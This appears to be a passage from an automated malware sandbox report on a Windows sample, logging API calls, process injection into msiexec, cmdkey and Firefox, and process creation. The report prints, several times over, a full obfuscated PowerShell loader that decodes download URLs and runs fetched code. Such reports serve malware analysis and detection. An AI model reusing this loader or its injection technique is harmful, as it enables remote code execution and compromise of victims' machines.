          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtClose: Direct from: 0x76EF2B6C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 7084Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4030000Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#versfods pudser ringmrknings gonitis recuperability saggio doceret #>;$homoplasy='stenkulsnaftas';<#rejicer amanuensiser manticory #>;$feminisere=$oversalts+$host.ui; function naturvrdi($unmannerliness){if ($feminisere) {$varens++;}$uenigst=$etymologiserendes+$unmannerliness.'length'-$varens; for( $erhold=4;$erhold -lt $uenigst;$erhold+=5){$generationsprojekters=$erhold;$lucuma+=$unmannerliness[$erhold];$bergensisk='costively';}$lucuma;}function furnage($lokummet){ & ($brneballet) ($lokummet);}$prereceived=naturvrdi 'malim atio hi,zsp.lifibrlbagmltilkaexte/rytt ';$prereceived+=naturvrdi ' kyl5r,ek.bran0neut fo b(berewafm i quanfl.ld brsoestawunlusc ch appensphet et howd1enek0him .flle0 tje;repr oxy wc diiskadnbesk6abor4call;fors fastxstem6gav.4phan;st.u prodr kiovgdni: ben1grun3v sp1su t.land0st r)m,sc supeghandecatac.uffkr cho vau/su c2 car0 amp1posi0zirk0reg.1fist0d ba1vide f.anfsurvisengrma,kerutef edeoescaxle b/tild1incu3para1inde.tryp0brod ';$teosofis=naturvrdi 'm.deuschnsmicrebeborsprn-tillasandg hage s.enopgatwaba ';$soybean=naturvrdi 'reveh fort.quat.usqpkultspros:pref/ ko./undewkat.wjazzw uda.sh,pgvermrp euostoeuudenpth,or ambi s ea brumpsyc.ud ycpaapopatemcopr/fit.k p roiri,a replafhji emtfeasitermougr nlkkeeproprcyst.comppunsorberrxid n>arabhembltsarotkommp frssanti: ent/pu s/kalabs virdetau emtmo.sa.ent. iscp olilmode/be ekleptote aakruslcur.ifetct,araieteropourn okkecha rsi,h.cocrpsprkrtankx mer>behnhlagdtrevatprofpsludsreso:brug/prop/ geopoptar undoprepmtavieprecnops,t lr eberer dob.actir iveshaug/irrekkineopneua failtri,i rhatankei aveoslatnveroefeudrveli.sammpdownr .eixsnke ';$knulling=naturvrdi 'geom>bagg ';$brneballet=naturvrdi 'hun iincoefri x svu ';$deposito='kalkudsivning';$mantelet70='\spgelseshistories.hov';furnage (naturvrdi 'wo l$ recgr malsab ohersbparaahelll ind:lotapspisr auteopskd ,iriovercfrs,aplanbmainlfiskepres=trai$ frielat nbrunvdumb:ban a bo phelmppr ddi aia.ntrttor a.arr+cloa$dioxmmechadivinudd ttr,ne dlgloptiedybstr ne7lnko0tegn ');furnage (naturvrdi 'smas$percgo erlsau oelanbhjemat aplskyg:advio oksp no.thydrrunfevu unl cceudsvt opp2e cr2fors7laud= h.r$ruelsi dvooverysoldbkorsepunca prkn abl.rvenstlpeptypolbetoiforetpaaf(,ekn$unq kputrnkittu klalnondl.nami.oncnfibrg vid)el e ');furnage (naturvrdi 'stan[ corni che,angtov r.testsko te approm gv ridiappeckrniee tepbesgoakmui batn miltukrlm bacaslannophoapolyg gkkecolprhydr] ood:v gr: ba shogtegramcso ou,avnr.resiundetsympyyumapi,terskrio .agtskreou tac forohammlpa.v asc=oplg voic[swiln.ilbepenkt in .jap,s nuleimdec dpauursirunfaimisstdoo yinfip t.ert ndoundet m,rocrazc k.locounlmou treneyruswp,ddee yn]neur:john:paattplumlr,acsefte1inte2f.os ');$soybean=$optrvlet227[0];$afbrnde=(naturvrdi 'frek$ un gur nl balotetoblimnaskollecze: .hikheteaawaksenwik forebrutlphonokenit negtafb,eearlrr.tenfor,estubsreko=taenn ceme te wpart-ve.do
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#versfods pudser ringmrknings gonitis recuperability saggio doceret #>;$homoplasy='stenkulsnaftas';<#rejicer amanuensiser manticory #>;$feminisere=$oversalts+$host.ui; function naturvrdi($unmannerliness){if ($feminisere) {$varens++;}$uenigst=$etymologiserendes+$unmannerliness.'length'-$varens; for( $erhold=4;$erhold -lt $uenigst;$erhold+=5){$generationsprojekters=$erhold;$lucuma+=$unmannerliness[$erhold];$bergensisk='costively';}$lucuma;}function furnage($lokummet){ & ($brneballet) ($lokummet);}$prereceived=naturvrdi 'malim atio hi,zsp.lifibrlbagmltilkaexte/rytt ';$prereceived+=naturvrdi ' kyl5r,ek.bran0neut fo b(berewafm i quanfl.ld brsoestawunlusc ch appensphet et howd1enek0him .flle0 tje;repr oxy wc diiskadnbesk6abor4call;fors fastxstem6gav.4phan;st.u prodr kiovgdni: ben1grun3v sp1su t.land0st r)m,sc supeghandecatac.uffkr cho vau/su c2 car0 amp1posi0zirk0reg.1fist0d ba1vide f.anfsurvisengrma,kerutef edeoescaxle b/tild1incu3para1inde.tryp0brod ';$teosofis=naturvrdi 'm.deuschnsmicrebeborsprn-tillasandg hage s.enopgatwaba ';$soybean=naturvrdi 'reveh fort.quat.usqpkultspros:pref/ ko./undewkat.wjazzw uda.sh,pgvermrp euostoeuudenpth,or ambi s ea brumpsyc.ud ycpaapopatemcopr/fit.k p roiri,a replafhji emtfeasitermougr nlkkeeproprcyst.comppunsorberrxid n>arabhembltsarotkommp frssanti: ent/pu s/kalabs virdetau emtmo.sa.ent. iscp olilmode/be ekleptote aakruslcur.ifetct,araieteropourn okkecha rsi,h.cocrpsprkrtankx mer>behnhlagdtrevatprofpsludsreso:brug/prop/ geopoptar undoprepmtavieprecnops,t lr eberer dob.actir iveshaug/irrekkineopneua failtri,i rhatankei aveoslatnveroefeudrveli.sammpdownr .eixsnke ';$knulling=naturvrdi 'geom>bagg ';$brneballet=naturvrdi 'hun iincoefri x svu ';$deposito='kalkudsivning';$mantelet70='\spgelseshistories.hov';furnage (naturvrdi 'wo l$ recgr malsab ohersbparaahelll ind:lotapspisr auteopskd ,iriovercfrs,aplanbmainlfiskepres=trai$ frielat nbrunvdumb:ban a bo phelmppr ddi aia.ntrttor a.arr+cloa$dioxmmechadivinudd ttr,ne dlgloptiedybstr ne7lnko0tegn ');furnage (naturvrdi 'smas$percgo erlsau oelanbhjemat aplskyg:advio oksp no.thydrrunfevu unl cceudsvt opp2e cr2fors7laud= h.r$ruelsi dvooverysoldbkorsepunca prkn abl.rvenstlpeptypolbetoiforetpaaf(,ekn$unq kputrnkittu klalnondl.nami.oncnfibrg vid)el e ');furnage (naturvrdi 'stan[ corni che,angtov r.testsko te approm gv ridiappeckrniee tepbesgoakmui batn miltukrlm bacaslannophoapolyg gkkecolprhydr] ood:v gr: ba shogtegramcso ou,avnr.resiundetsympyyumapi,terskrio .agtskreou tac forohammlpa.v asc=oplg voic[swiln.ilbepenkt in .jap,s nuleimdec dpauursirunfaimisstdoo yinfip t.ert ndoundet m,rocrazc k.locounlmou treneyruswp,ddee yn]neur:john:paattplumlr,acsefte1inte2f.os ');$soybean=$optrvlet227[0];$afbrnde=(naturvrdi 'frek$ un gur nl balotetoblimnaskollecze: .hikheteaawaksenwik forebrutlphonokenit negtafb,eearlrr.tenfor,estubsreko=taenn ceme te wpart-ve.do
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#versfods pudser ringmrknings gonitis recuperability saggio doceret #>;$homoplasy='stenkulsnaftas';<#rejicer amanuensiser manticory #>;$feminisere=$oversalts+$host.ui; function naturvrdi($unmannerliness){if ($feminisere) {$varens++;}$uenigst=$etymologiserendes+$unmannerliness.'length'-$varens; for( $erhold=4;$erhold -lt $uenigst;$erhold+=5){$generationsprojekters=$erhold;$lucuma+=$unmannerliness[$erhold];$bergensisk='costively';}$lucuma;}function furnage($lokummet){ & ($brneballet) ($lokummet);}$prereceived=naturvrdi 'malim atio hi,zsp.lifibrlbagmltilkaexte/rytt ';$prereceived+=naturvrdi ' kyl5r,ek.bran0neut fo b(berewafm i quanfl.ld brsoestawunlusc ch appensphet et howd1enek0him .flle0 tje;repr oxy wc diiskadnbesk6abor4call;fors fastxstem6gav.4phan;st.u prodr kiovgdni: ben1grun3v sp1su t.land0st r)m,sc supeghandecatac.uffkr cho vau/su c2 car0 amp1posi0zirk0reg.1fist0d ba1vide f.anfsurvisengrma,kerutef edeoescaxle b/tild1incu3para1inde.tryp0brod ';$teosofis=naturvrdi 'm.deuschnsmicrebeborsprn-tillasandg hage s.enopgatwaba ';$soybean=naturvrdi 'reveh fort.quat.usqpkultspros:pref/ ko./undewkat.wjazzw uda.sh,pgvermrp euostoeuudenpth,or ambi s ea brumpsyc.ud ycpaapopatemcopr/fit.k p roiri,a replafhji emtfeasitermougr nlkkeeproprcyst.comppunsorberrxid n>arabhembltsarotkommp frssanti: ent/pu s/kalabs virdetau emtmo.sa.ent. iscp olilmode/be ekleptote aakruslcur.ifetct,araieteropourn okkecha rsi,h.cocrpsprkrtankx mer>behnhlagdtrevatprofpsludsreso:brug/prop/ geopoptar undoprepmtavieprecnops,t lr eberer dob.actir iveshaug/irrekkineopneua failtri,i rhatankei aveoslatnveroefeudrveli.sammpdownr .eixsnke ';$knulling=naturvrdi 'geom>bagg ';$brneballet=naturvrdi 'hun iincoefri x svu ';$deposito='kalkudsivning';$mantelet70='\spgelseshistories.hov';furnage (naturvrdi 'wo l$ recgr malsab ohersbparaahelll ind:lotapspisr auteopskd ,iriovercfrs,aplanbmainlfiskepres=trai$ frielat nbrunvdumb:ban a bo phelmppr ddi aia.ntrttor a.arr+cloa$dioxmmechadivinudd ttr,ne dlgloptiedybstr ne7lnko0tegn ');furnage (naturvrdi 'smas$percgo erlsau oelanbhjemat aplskyg:advio oksp no.thydrrunfevu unl cceudsvt opp2e cr2fors7laud= h.r$ruelsi dvooverysoldbkorsepunca prkn abl.rvenstlpeptypolbetoiforetpaaf(,ekn$unq kputrnkittu klalnondl.nami.oncnfibrg vid)el e ');furnage (naturvrdi 'stan[ corni che,angtov r.testsko te approm gv ridiappeckrniee tepbesgoakmui batn miltukrlm bacaslannophoapolyg gkkecolprhydr] ood:v gr: ba shogtegramcso ou,avnr.resiundetsympyyumapi,terskrio .agtskreou tac forohammlpa.v asc=oplg voic[swiln.ilbepenkt in .jap,s nuleimdec dpauursirunfaimisstdoo yinfip t.ert ndoundet m,rocrazc k.locounlmou treneyruswp,ddee yn]neur:john:paattplumlr,acsefte1inte2f.os ');$soybean=$optrvlet227[0];$afbrnde=(naturvrdi 'frek$ un gur nl balotetoblimnaskollecze: .hikheteaawaksenwik forebrutlphonokenit negtafb,eearlrr.tenfor,estubsreko=taenn ceme te wpart-ve.doJump to behavior
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
